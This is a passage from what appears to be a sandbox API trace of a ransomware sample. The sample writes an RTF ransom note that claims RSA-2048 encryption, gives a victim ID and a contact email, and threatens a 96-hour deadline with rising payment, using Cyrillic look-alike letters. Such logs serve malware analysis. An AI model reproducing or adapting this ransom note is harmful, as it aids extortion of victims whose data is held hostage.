H\\LANG1049\\F0\\'EE\\LANG1033\\F1 URS\\LANG1049\\F0 \\LANG1033\\F1 TH\\LANG1049\\F0\\'E5\\LANG1033\\F1 P\\LANG1049\\F0\\'E0\\'F3\\LANG1033\\F1 M\\LANG1049\\F0\\'E5\\LANG1033\\F1 NT SIZ\\LANG1049\\F0\\'E5\\LANG1033\\F1 WILL B\\LANG1049\\F0\\'E5\\LANG1033\\F1 \\LANG1049\\F0\\'E0\\LANG1033\\F1 UT\\LANG1049\\F0\\'EE\\LANG1033\\F1 M\\LANG1049\\F0\\'E0\\LANG1033\\F1 TIC\\LANG1049\\F0\\'E0\\LANG1033\\F1 LL\\LANG1049\\F0\\'F3\\LANG1033\\F1 IN\\LANG1049\\F0\\'F1\\LANG1033\\F1 R\\LANG1049\\F0\\'E5\\'E0\\LANG1033\\F1 S\\LANG1049\\F0\\'E5\\LANG1033\\F1 D B\\LANG1049\\F0\\'F3\\LANG1033\\F1 100$!\\LANG1049\\F0\\PAR\r\n\\CF0\\B0\\'C0LL TH\\'E5 \\'E0TT\\'E5MPTS \\'EEF D\\'E5\\'F1RYPTI\\'EEN BY Y\\'EEURS\\'E5LF WILL R\\'E5SULT \\'EENLY IN IRR\\'E5V\\'EE\\'F1\\'E0BLE L\\'EESS \\'EEF Y\\'EEUR D\\'E0T\\'E0.\\PAR\r\nIF Y\\'EEU STILL W\\'E0NT T\\'EE TRY T\\'EE D\\'E5CRYPT TH\\'E5M BY Y\\'EEURS\\'E5LF PL\\'E5\\'E0S\\'E5 M\\'E0K\\'E5 \\'E0 B\\'E0CKUP \\'E0T FIRST B\\'E5C\\'E0US\\'E5 TH\\'E5 D\\'E5\\'F1RYPTI\\'EEN WILL B\\'E5C\\'EEM\\'E5 IMP\\'EESSIBL\\'E5 IN C\\'E0S\\'E5 \\'EEF \\'E0NY CH\\'E0NG\\'E5S INSID\\'E5 TH\\'E5 FIL\\'E5S.\\PAR\r\nIF Y\\'EEU DID N\\'EET R\\'E5C\\'") returned 0x1610 [0112.815] CharUpperBuffW (in: lpsz="[EML1]", cchLength=0x6 | out: lpsz="[EML1]") returned 0x6 [0112.815] CharUpperBuffW (in: lpsz="{\\rtf1\\ansi\\ansicpg1251\\deff0\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset204 Calibri;}{\\f1\\fnil\\fcharset0 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;}\r\n{\\*\\generator Msftedit 5.41.21.2510;}\\viewkind4\\uc1\\pard\\ri-500\\sa200\\sl240\\slmult1\\tx8804\\b\\f0\\fs28\\'c0\\lang1033\\f1 tt\\lang1049\\f0\\'e5\\lang1033\\f1 nti\\lang1049\\f0\\'ee\\lang1033\\f1 n\\lang1049\\f0 ! \\'c0\\lang1033\\f1 ll\\lang1049\\f0 \\lang1033\\f1 y\\lang1049\\f0\\'ee\\lang1033\\f1 ur\\lang1049\\f0 \\lang1033\\f1 fil\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0 \\lang1033\\f1 w\\lang1049\\f0\\'e5\\lang1033\\f1 r\\lang1049\\f0\\'e5 \\'e5\\lang1033\\f1 n\\lang1049\\f0\\'f1\\lang1033\\f1 ry\\lang1049\\f0\\'f0\\lang1033\\f1 t\\lang1049\\f0\\'e5\\lang1033\\f1 d with RS\\lang1049\\f0\\'c0-\\lang1033\\f1 2048 \\lang1049\\f0\\'e0\\lang1033\\f1 lg\\lang1049\\f0\\'ee\\lang1033\\f1 rithm\\lang1049\\f0 .\\par\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\lang1033\\b0\\f1\\fs24 With\\lang1049\\f0\\'ee\\lang1033\\f1 ut \\lang1049\\f0\\'f3\\'ee\\lang1033\\f1 ur p\\lang1049\\f0\\'e5\\lang1033\\f1 rs\\lang1049\\f0\\'ee\\lang1033\\f1 n\\lang1049\\f0\\'e0\\lang1033\\f1 l d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\lang1033\\f1 pti\\lang1049\\f0\\'ee\\lang1033\\f1 n k\\lang1049\\f0\\'e5\\lang1033\\f1 y d\\lang1049\\f0\\'e0\\lang1033\\f1 t\\lang1049\\f0\\'e0\\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'ee\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 r\\lang1049\\f0\\'f3\\lang1033\\f1 is imp\\lang1049\\f0\\'ee\\lang1033\\f1 ssibl\\lang1049\\f0\\'e5\\lang1033\\f1 !\\par\r\nT\\lang1049\\f0\\'ee \\lang1033\\f1 g\\lang1049\\f0\\'e5\\lang1033\\f1 t y\\lang1049\\f0\\'ee\\lang1033\\f1 ur uniqu\\lang1049\\f0\\'e5 \\lang1033\\f1 k\\lang1049\\f0\\'e5\\lang1033\\f1 y \\lang1049\\f0\\'e0\\lang1033\\f1 nd d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\'f0\\lang1033\\f1 t th\\lang1049\\f0\\'e5\\lang1033\\f1 fil\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0 , \\lang1033\\f1 Y\\lang1049\\f0\\'ee\\lang1033\\f1 u h\\lang1049\\f0\\'e0\\lang1033\\f1 v\\lang1049\\f0\\'e5 \\lang1033\\f1 to s\\lang1049\\f0\\'e5\\lang1033\\f1 nd th\\lang1049\\f0\\'e5\\lang1033\\f1 f\\lang1049\\f0\\'ee\\lang1033\\f1 ll\\lang1049\\f0\\'ee\\lang1033\\f1 wing c\\lang1049\\f0\\'ee\\lang1033\\f1 d\\lang1049\\f0\\'e5:\\par\r\n\\pard\\sa200\\sl240\\slmult1\\lang1033\\b\\f1\\fs28 COSLb0cVd9bCx1vp-3188F4D96148D062\\lang1049\\f0\\fs32\\par\r\n\\lang1033\\b0\\f1\\fs24 t\\lang1049\\f0\\'ee\\lang1033\\f1 \\lang1049\\f0\\'ee\\lang1033\\f1 ur \\lang1049\\f0\\'e5\\lang1033\\f1 -m\\lang1049\\f0\\'e0\\lang1033\\f1 il \\lang1049\\f0\\'e0\\lang1033\\f1 ddr\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0 : \\lang1033\\b\\f1\\fs28 bluetablet9643@yahoo.com\\lang1049\\b0\\f0\\fs32\\par\r\n\\lang1033\\f1\\fs24 Th\\lang1049\\f0\\'e5\\lang1033\\f1 n Y\\lang1049\\f0\\'ee\\lang1033\\f1 u will r\\lang1049\\f0\\'e5\\lang1033\\f1 ci\\lang1049\\f0\\'e5\\lang1033\\f1 v\\lang1049\\f0\\'e5 \\'e0\\lang1033\\f1 ll n\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0\\'e0\\lang1033\\f1 ry instru\\lang1049\\f0\\'f1\\lang1033\\f1 ti\\lang1049\\f0\\'ee\\lang1033\\f1 ns\\lang1049\\f0 .\\par\r\n\\cf1\\lang1033\\b\\f1 Y\\lang1049\\f0\\'ee\\lang1033\\f1 u h\\lang1049\\f0\\'e0\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'ee\\lang1033\\f1 nl\\lang1049\\f0\\'f3\\lang1033\\f1 \\lang1049\\f0 96\\lang1033\\f1 h\\lang1049\\f0\\'ee\\lang1033\\f1 urs t\\lang1049\\f0\\'ee\\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'ee\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 r y\\lang1049\\f0\\'ee\\lang1033\\f1 ur d\\lang1049\\f0\\'e0\\lang1033\\f1 t\\lang1049\\f0\\'e0\\lang1033\\f1 ! \\lang1049\\f0\\'c0\\lang1033\\f1 ft\\lang1049\\f0\\'e5\\lang1033\\f1 r this tim\\lang1049\\f0\\'e5\\lang1033\\f1 y\\lang1049\\f0\\'ee\\lang1033\\f1 ur uniqu\\lang1049\\f0\\'e5 \\lang1033\\f1 d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\'f0\\lang1033\\f1 ti\\lang1049\\f0\\'ee\\lang1033\\f1 n k\\lang1049\\f0\\'e5\\lang1033\\f1 y will b\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'e0\\lang1033\\f1 ut\\lang1049\\f0\\'ee\\lang1033\\f1 m\\lang1049\\f0\\'e0\\lang1033\\f1 tic\\lang1049\\f0\\'e0\\lang1033\\f1 ll\\lang1049\\f0\\'f3\\lang1033\\f1 d\\lang1049\\f0\\'e5\\lang1033\\f1 l\\lang1049\\f0\\'e5\\lang1033\\f1 t\\lang1049\\f0\\'e5\\lang1033\\f1 d \\lang1049\\f0\\'e0\\lang1033\\f1 nd fil\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0 d\\'e5\\'f1r\\'f3\\'f0ti\\'een will b\\'e5c\\'eem\\'e5 im\\'f0\\'eessibl\\'e5\\lang1033\\f1 !\\par\r\nHurr\\lang1049\\f0\\'f3\\lang1033\\f1 u\\lang1049\\f0\\'f0\\lang1033\\f1 ! \\lang1049\\f0\\'c5\\'e0\\'f1\\lang1033\\f1 h 12 h\\lang1049\\f0\\'ee\\lang1033\\f1 urs\\lang1049\\f0 \\lang1033\\f1 th\\lang1049\\f0\\'e5\\lang1033\\f1 p\\lang1049\\f0\\'e0\\'f3\\lang1033\\f1 m\\lang1049\\f0\\'e5\\lang1033\\f1 nt siz\\lang1049\\f0\\'e5\\lang1033\\f1 will b\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'e0\\lang1033\\f1 ut\\lang1049\\f0\\'ee\\lang1033\\f1 m\\lang1049\\f0\\'e0\\lang1033\\f1 tic\\lang1049\\f0\\'e0\\lang1033\\f1 ll\\lang1049\\f0\\'f3\\lang1033\\f1 in\\lang1049\\f0\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'e5\\'e0\\lang1033\\f1 s\\lang1049\\f0\\'e5\\lang1033\\f1 d b\\lang1049\\f0\\'f3\\lang1033\\f1 100$!\\lang1049\\f0\\par\r\n\\cf0\\b0\\'c0ll th\\'e5 \\'e0tt\\'e5mpts \\'eef d\\'e5\\'f1rypti\\'een by y\\'eeurs\\'e5lf will r\\'e5sult \\'eenly in irr\\'e5v\\'ee\\'f1\\'e0ble l\\'eess \\'eef y\\'eeur d\\'e0t\\'e0.\\par\r\nIf y\\'eeu still w\\'e0nt t\\'ee try t\\'ee d\\'e5crypt th\\'e5m by y\\'eeurs\\'e5lf pl\\'e5\\'e0s\\'e5 m\\'e0k\\'e5 \\'e0 b\\'e0ckup \\'e0t first b\\'e5c\\'e0us\\'e5 th\\'e5 d\\'e5\\'f1rypti\\'een will b\\'e5c\\'eem\\'e5 imp\\'eessibl\\'e5 in c\\'e0s\\'e5 \\'eef \\'e0ny ch\\'e0ng\\'e5s insid\\'e5 th\\'e5 fil\\'e5s.\\par\r\nIf y\\'eeu d", cchLength=0x1622 | out: lpsz="{\\RTF1\\ANSI\\ANSICPG1251\\DEFF0\\DEFLANG1049{\\FONTTBL{\\F0\\FNIL\\FCHARSET204 CALIBRI;}{\\F1\\FNIL\\FCHARSET0 CALIBRI;}}\r\n{\\COLORTBL ;\\RED255\\GREEN0\\BLUE0;}\r\n{\\*\\GENERATOR MSFTEDIT 5.41.21.2510;}\\VIEWKIND4\\UC1\\PARD\\RI-500\\SA200\\SL240\\SLMULT1\\TX8804\\B\\F0\\FS28\\'C0\\LANG1033\\F1 TT\\LANG1049\\F0\\'E5\\LANG1033\\F1 NTI\\LANG1049\\F0\\'EE\\LANG1033\\F1 N\\LANG1049\\F0 ! \\'C0\\LANG1033\\F1 LL\\LANG1049\\F0 \\LANG1033\\F1 Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 UR\\LANG1049\\F0 \\LANG1033\\F1 FIL\\LANG1049\\F0\\'E5\\LANG1033\\F1 S\\LANG1049\\F0 \\LANG1033\\F1 W\\LANG1049\\F0\\'E5\\LANG1033\\F1 R\\LANG1049\\F0\\'E5 \\'E5\\LANG1033\\F1 N\\LANG1049\\F0\\'F1\\LANG1033\\F1 RY\\LANG1049\\F0\\'F0\\LANG1033\\F1 T\\LANG1049\\F0\\'E5\\LANG1033\\F1 D WITH RS\\LANG1049\\F0\\'C0-\\LANG1033\\F1 2048 \\LANG1049\\F0\\'E0\\LANG1033\\F1 LG\\LANG1049\\F0\\'EE\\LANG1033\\F1 RITHM\\LANG1049\\F0 .\\PAR\r\n\\PARD\\RI-74\\SA200\\SL240\\SLMULT1\\TX8378\\LANG1033\\B0\\F1\\FS24 WITH\\LANG1049\\F0\\'EE\\LANG1033\\F1 UT \\LANG1049\\F0\\'F3\\'EE\\LANG1033\\F1 UR P\\LANG1049\\F0\\'E5\\LANG1033\\F1 RS\\LANG1049\\F0\\'EE\\LANG1033\\F1 N\\LANG1049\\F0\\'E0\\LANG1033\\F1 L D\\LANG1049\\F0\\'E5\\'F1\\LANG1033\\F1 R\\LANG1049\\F0\\'F3\\LANG1033\\F1 PTI\\LANG1049\\F0\\'EE\\LANG1033\\F1 N K\\LANG1049\\F0\\'E5\\LANG1033\\F1 Y D\\LANG1049\\F0\\'E0\\LANG1033\\F1 T\\LANG1049\\F0\\'E0\\LANG1033\\F1 R\\LANG1049\\F0\\'E5\\LANG1033\\F1 C\\LANG1049\\F0\\'EE\\LANG1033\\F1 V\\LANG1049\\F0\\'E5\\LANG1033\\F1 R\\LANG1049\\F0\\'F3\\LANG1033\\F1 IS IMP\\LANG1049\\F0\\'EE\\LANG1033\\F1 SSIBL\\LANG1049\\F0\\'E5\\LANG1033\\F1 !\\PAR\r\nT\\LANG1049\\F0\\'EE \\LANG1033\\F1 G\\LANG1049\\F0\\'E5\\LANG1033\\F1 T Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 UR UNIQU\\LANG1049\\F0\\'E5 \\LANG1033\\F1 K\\LANG1049\\F0\\'E5\\LANG1033\\F1 Y \\LANG1049\\F0\\'E0\\LANG1033\\F1 ND D\\LANG1049\\F0\\'E5\\'F1\\LANG1033\\F1 R\\LANG1049\\F0\\'F3\\'F0\\LANG1033\\F1 T TH\\LANG1049\\F0\\'E5\\LANG1033\\F1 FIL\\LANG1049\\F0\\'E5\\LANG1033\\F1 S\\LANG1049\\F0 , \\LANG1033\\F1 Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 U H\\LANG1049\\F0\\'E0\\LANG1033\\F1 V\\LANG1049\\F0\\'E5 \\LANG1033\\F1 TO S\\LANG1049\\F0\\'E5\\LANG1033\\F1 ND TH\\LANG1049\\F0\\'E5\\LANG1033\\F1 F\\LANG1049\\F0\\'EE\\LANG1033\\F1 LL\\LANG1049\\F0\\'EE\\LANG1033\\F1 WING C\\LANG1049\\F0\\'EE\\LANG1033\\F1 D\\LANG1049\\F0\\'E5:\\PAR\r\n\\PARD\\SA200\\SL240\\SLMULT1\\LANG1033\\B\\F1\\FS28 COSLB0CVD9BCX1VP-3188F4D96148D062\\LANG1049\\F0\\FS32\\PAR\r\n\\LANG1033\\B0\\F1\\FS24 T\\LANG1049\\F0\\'EE\\LANG1033\\F1 \\LANG1049\\F0\\'EE\\LANG1033\\F1 UR \\LANG1049\\F0\\'E5\\LANG1033\\F1 -M\\LANG1049\\F0\\'E0\\LANG1033\\F1 IL \\LANG1049\\F0\\'E0\\LANG1033\\F1 DDR\\LANG1049\\F0\\'E5\\LANG1033\\F1 SS\\LANG1049\\F0 : \\LANG1033\\B\\F1\\FS28 BLUETABLET9643@YAHOO.COM\\LANG1049\\B0\\F0\\FS32\\PAR\r\n\\LANG1033\\F1\\FS24 TH\\LANG1049\\F0\\'E5\\LANG1033\\F1 N Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 U WILL R\\LANG1049\\F0\\'E5\\LANG1033\\F1 CI\\LANG1049\\F0\\'E5\\LANG1033\\F1 V\\LANG1049\\F0\\'E5 \\'E0\\LANG1033\\F1 LL N\\LANG1049\\F0\\'E5\\LANG1033\\F1 C\\LANG1049\\F0\\'E5\\LANG1033\\F1 SS\\LANG1049\\F0\\'E0\\LANG1033\\F1 RY INSTRU\\LANG1049\\F0\\'F1\\LANG1033\\F1 TI\\LANG1049\\F0\\'EE\\LANG1033\\F1 NS\\LANG1049\\F0 .\\PAR\r\n\\CF1\\LANG1033\\B\\F1 Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 U H\\LANG1049\\F0\\'E0\\LANG1033\\F1 V\\LANG1049\\F0\\'E5\\LANG1033\\F1 \\LANG1049\\F0\\'EE\\LANG1033\\F1 NL\\LANG1049\\F0\\'F3\\LANG1033\\F1 \\LANG1049\\F0 96\\LANG1033\\F1 H\\LANG1049\\F0\\'EE\\LANG1033\\F1 URS T\\LANG1049\\F0\\'EE\\LANG1033\\F1 R\\LANG1049\\F0\\'E5\\LANG1033\\F1 C\\LANG1049\\F0\\'EE\\LANG1033\\F1 V\\LANG1049\\F0\\'E5\\LANG1033\\F1 R Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 UR D\\LANG1049\\F0\\'E0\\LANG1033\\F1 T\\LANG1049\\F0\\'E0\\LANG1033\\F1 ! \\LANG1049\\F0\\'C0\\LANG1033\\F1 FT\\LANG1049\\F0\\'E5\\LANG1033\\F1 R THIS TIM\\LANG1049\\F0\\'E5\\LANG1033\\F1 Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 UR UNIQU\\LANG1049\\F0\\'E5 \\LANG1033\\F1 D\\LANG1049\\F0\\'E5\\'F1\\LANG1033\\F1 R\\LANG1049\\F0\\'F3\\'F0\\LANG1033\\F1 TI\\LANG1049\\F0\\'EE\\LANG1033\\F1 N K\\LANG1049\\F0\\'E5\\LANG1033\\F1 Y WILL B\\LANG1049\\F0\\'E5\\LANG1033\\F1 \\LANG1049\\F0\\'E0\\LANG1033\\F1 UT\\LANG1049\\F0\\'EE\\LANG1033\\F1 M\\LANG1049\\F0\\'E0\\LANG1033\\F1 TIC\\LANG1049\\F0\\'E0\\LANG1033\\F1 LL\\LANG1049\\F0\\'F3\\LANG1033\\F1 D\\LANG1049\\F0\\'E5\\LANG1033\\F1 L\\LANG1049\\F0\\'E5\\LANG1033\\F1 T\\LANG1049\\F0\\'E5\\LANG1033\\F1 D \\LANG1049\\F0\\'E0\\LANG1033\\F1 ND FIL\\LANG1049\\F0\\'E5\\LANG1033\\F1 \\LANG1049\\F0 D\\'E5\\'F1R\\'F3\\'F0TI\\'EEN WILL B\\'E5C\\'EEM\\'E5 IM\\'F0\\'EESSIBL\\'E5\\LANG1033\\F1 !\\PAR\r\nHURR\\LANG1049\\F0\\'F3\\LANG1033\\F1 U\\LANG1049\\F0\\'F0\\LANG1033\\F1 ! \\LANG1049\\F0\\'C5\\'E0\\'F1\\LANG1033\\F1 H 12 H\\LANG1049\\F0\\'EE\\LANG1033\\F1 URS\\LANG1049\\F0 \\LANG1033\\F1 TH\\LANG1049\\F0\\'E5\\LANG1033\\F1 P\\LANG1049\\F0\\'E0\\'F3\\LANG1033\\F1 M\\LANG1049\\F0\\'E5\\LANG1033\\F1 NT SIZ\\LANG1049\\F0\\'E5\\LANG1033\\F1 WILL B\\LANG1049\\F0\\'E5\\LANG1033\\F1 \\LANG1049\\F0\\'E0\\LANG1033\\F1 UT\\LANG1049\\F0\\'EE\\LANG1033\\F1 M\\LANG1049\\F0\\'E0\\LANG1033\\F1 TIC\\LANG1049\\F0\\'E0\\LANG1033\\F1 LL\\LANG1049\\F0\\'F3\\LANG1033\\F1 IN\\LANG1049\\F0\\'F1\\LANG1033\\F1 R\\LANG1049\\F0\\'E5\\'E0\\LANG1033\\F1 S\\LANG1049\\F0\\'E5\\LANG1033\\F1 D B\\LANG1049\\F0\\'F3\\LANG1033\\F1 100$!\\LANG1049\\F0\\PAR\r\n\\CF0\\B0\\'C0LL TH\\'E5 \\'E0TT\\'E5MPTS \\'EEF D\\'E5\\'F1RYPTI\\'EEN BY Y\\'EEURS\\'E5LF WILL R\\'E5SULT \\'EENLY IN IRR\\'E5V\\'EE\\'F1\\'E0BLE L\\'EESS \\'EEF Y\\'EEUR D\\'E0T\\'E0.\\PAR\r\nIF Y\\'EEU STILL W\\'E0NT T\\'EE TRY T\\'EE D\\'E5CRYPT TH\\'E5M BY Y\\'EEURS\\'E5LF PL\\'E5\\'E0S\\'E5 M\\'E0K\\'E5 \\'E0 B\\'E0CKUP \\'E0T FIRST B\\'E5C\\'E0US\\'E5 TH\\'E5 D\\'E5\\'F1RYPTI\\'EEN WILL B\\'E5C\\'EEM\\'E5 IMP\\'EESSIBL\\'E5 IN C\\'E0S\\'E5 \\'EEF \\'E0NY CH\\'E0NG\\'E5S INSID\\'E5 TH\\'E5 FIL\\'E5S.\\PAR\r\nIF Y\\'EEU D") returned 0x1622 [0112.815] CharUpperBuffW (in: lpsz="[EML2]", cchLength=0x6 | out: lpsz="[EML2]") returned 0x6 [0112.816] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0112.816] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset204 Calibri;}{\\f1\\fnil\\fcharset0 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;}\r\n{\\*\\generator Msftedit 5.41.21.2510;}\\viewkind4\\uc1\\pard\\ri-500\\sa200\\sl240\\slmult1\\tx8804\\b\\f0\\fs28\\'c0\\lang1033\\f1 tt\\lang1049\\f0\\'e5\\lang1033\\f1 nti\\lang1049\\f0\\'ee\\lang1033\\f1 n\\lang1049\\f0 ! \\'c0\\lang1033\\f1 ll\\lang1049\\f0 \\lang1033\\f1 y\\lang1049\\f0\\'ee\\lang1033\\f1 ur\\lang1049\\f0 \\lang1033\\f1 fil\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0 \\lang1033\\f1 w\\lang1049\\f0\\'e5\\lang1033\\f1 r\\lang1049\\f0\\'e5 \\'e5\\lang1033\\f1 n\\lang1049\\f0\\'f1\\lang1033\\f1 ry\\lang1049\\f0\\'f0\\lang1033\\f1 t\\lang1049\\f0\\'e5\\lang1033\\f1 d with RS\\lang1049\\f0\\'c0-\\lang1033\\f1 2048 \\lang1049\\f0\\'e0\\lang1033\\f1 lg\\lang1049\\f0\\'ee\\lang1033\\f1 rithm\\lang1049\\f0 .\\par\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\lang1033\\b0\\f1\\fs24 With\\lang1049\\f0\\'ee\\lang1033\\f1 ut \\lang1049\\f0\\'f3\\'ee\\lang1033\\f1 ur p\\lang1049\\f0\\'e5\\lang1033\\f1 rs\\lang1049\\f0\\'ee\\lang1033\\f1 n\\lang1049\\f0\\'e0\\lang1033\\f1 l d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\lang1033\\f1 pti\\lang1049\\f0\\'ee\\lang1033\\f1 n k\\lang1049\\f0\\'e5\\lang1033\\f1 y d\\lang1049\\f0\\'e0\\lang1033\\f1 t\\lang1049\\f0\\'e0\\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'ee\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 r\\lang1049\\f0\\'f3\\lang1033\\f1 is imp\\lang1049\\f0\\'ee\\lang1033\\f1 ssibl\\lang1049\\f0\\'e5\\lang1033\\f1 !\\par\r\nT\\lang1049\\f0\\'ee \\lang1033\\f1 g\\lang1049\\f0\\'e5\\lang1033\\f1 t y\\lang1049\\f0\\'ee\\lang1033\\f1 ur uniqu\\lang1049\\f0\\'e5 \\lang1033\\f1 k\\lang1049\\f0\\'e5\\lang1033\\f1 y \\lang1049\\f0\\'e0\\lang1033\\f1 nd d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\'f0\\lang1033\\f1 t th\\lang1049\\f0\\'e5\\lang1033\\f1 fil\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0 , \\lang1033\\f1 Y\\lang1049\\f0\\'ee\\lang1033\\f1 u h\\lang1049\\f0\\'e0\\lang1033\\f1 v\\lang1049\\f0\\'e5 \\lang1033\\f1 to s\\lang1049\\f0\\'e5\\lang1033\\f1 nd th\\lang1049\\f0\\'e5\\lang1033\\f1 f\\lang1049\\f0\\'ee\\lang1033\\f1 ll\\lang1049\\f0\\'ee\\lang1033\\f1 wing c\\lang1049\\f0\\'ee\\lang1033\\f1 d\\lang1049\\f0\\'e5:\\par\r\n\\pard\\sa200\\sl240\\slmult1\\lang1033\\b\\f1\\fs28 COSLb0cVd9bCx1vp-3188F4D96148D062\\lang1049\\f0\\fs32\\par\r\n\\lang1033\\b0\\f1\\fs24 t\\lang1049\\f0\\'ee\\lang1033\\f1 \\lang1049\\f0\\'ee\\lang1033\\f1 ur \\lang1049\\f0\\'e5\\lang1033\\f1 -m\\lang1049\\f0\\'e0\\lang1033\\f1 il \\lang1049\\f0\\'e0\\lang1033\\f1 ddr\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0 : \\lang1033\\b\\f1\\fs28 bluetablet9643@yahoo.com\\lang1049\\b0\\f0\\fs32\\par\r\n\\lang1033\\f1\\fs24 Th\\lang1049\\f0\\'e5\\lang1033\\f1 n Y\\lang1049\\f0\\'ee\\lang1033\\f1 u will r\\lang1049\\f0\\'e5\\lang1033\\f1 ci\\lang1049\\f0\\'e5\\lang1033\\f1 v\\lang1049\\f0\\'e5 \\'e0\\lang1033\\f1 ll n\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0\\'e0\\lang1033\\f1 ry instru\\lang1049\\f0\\'f1\\lang1033\\f1 ti\\lang1049\\f0\\'ee\\lang1033\\f1 ns\\lang1049\\f0 .\\par\r\n\\cf1\\lang1033\\b\\f1 Y\\lang1049\\f0\\'ee\\lang1033\\f1 u h\\lang1049\\f0\\'e0\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'ee\\lang1033\\f1 nl\\lang1049\\f0\\'f3\\lang1033\\f1 \\lang1049\\f0 96\\lang1033\\f1 h\\lang1049\\f0\\'ee\\lang1033\\f1 urs t\\lang1049\\f0\\'ee\\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'ee\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 r y\\lang1049\\f0\\'ee\\lang1033\\f1 ur d\\lang1049\\f0\\'e0\\lang1033\\f1 t\\lang1049\\f0\\'e0\\lang1033\\f1 ! \\lang1049\\f0\\'c0\\lang1033\\f1 ft\\lang1049\\f0\\'e5\\lang1033\\f1 r this tim\\lang1049\\f0\\'e5\\lang1033\\f1 y\\lang1049\\f0\\'ee\\lang1033\\f1 ur uniqu\\lang1049\\f0\\'e5 \\lang1033\\f1 d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\'f0\\lang1033\\f1 ti\\lang1049\\f0\\'ee\\lang1033\\f1 n k\\lang1049\\f0\\'e5\\lang1033\\f1 y will b\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'e0\\lang1033\\f1 ut\\lang1049\\f0\\'ee\\lang1033\\f1 m\\lang1049\\f0\\'e0\\lang1033\\f1 tic\\lang1049\\f0\\'e0\\lang1033\\f1 ll\\lang1049\\f0\\'f3\\lang1033\\f1 d\\lang1049\\f0\\'e5\\lang1033\\f1 l\\lang1049\\f0\\'e5\\lang1033\\f1 t\\lang1049\\f0\\'e5\\lang1033\\f1 d \\lang1049\\f0\\'e0\\lang1033\\f1 nd fil\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0 d\\'e5\\'f1r\\'f3\\'f0ti\\'een will b\\'e5c\\'eem\\'e5 im\\'f0\\'eessibl\\'e5\\lang1033\\f1 !\\par\r\nHurr\\lang1049\\f0\\'f3\\lang1033\\f1 u\\lang1049\\f0\\'f0\\lang1033\\f1 ! \\lang1049\\f0\\'c5\\'e0\\'f1\\lang1033\\f1 h 12 h\\lang1049\\f0\\'ee\\lang1033\\f1 urs\\lang1049\\f0 \\lang1033\\f1 th\\lang1049\\f0\\'e5\\lang1033\\f1 p\\lang1049\\f0\\'e0\\'f3\\lang1033\\f1 m\\lang1049\\f0\\'e5\\lang1033\\f1 nt siz\\lang1049\\f0\\'e5\\lang1033\\f1 will b\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'e0\\lang1033\\f1 ut\\lang1049\\f0\\'ee\\lang1033\\f1 m\\lang1049\\f0\\'e0\\lang1033\\f1 tic\\lang1049\\f0\\'e0\\lang1033\\f1 ll\\lang1049\\f0\\'f3\\lang1033\\f1 in\\lang1049\\f0\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'e5\\'e0\\lang1033\\f1 s\\lang1049\\f0\\'e5\\lang1033\\f1 d b\\lang1049\\f0\\'f3\\lang1033\\f1 